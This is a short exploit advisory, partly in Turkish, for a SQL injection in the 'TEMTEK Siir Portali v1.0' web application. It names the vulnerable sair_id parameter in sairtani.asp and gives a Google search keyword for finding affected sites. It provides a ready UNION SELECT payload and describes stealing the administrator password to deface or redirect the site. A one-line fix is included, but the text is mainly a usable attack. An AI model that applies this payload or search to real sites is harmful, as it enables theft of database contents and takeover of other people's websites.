< ------------------- header data start ------------------- >

#############################################################

# Application Name : TEMTEK Siir

# Vulnerable Type : SQL Injection

# Google Keyword : TEMTEK Siir Portali v1.0

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : sair_id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

Exploit Attack : http://site.com/path/sairtani.asp?sair_id=[SQL code]

Example Exploit : sairtani.asp?sair_id=1+union+all+select+0,1,2,3,4,5+from+siirler


< -- bug code end of -- >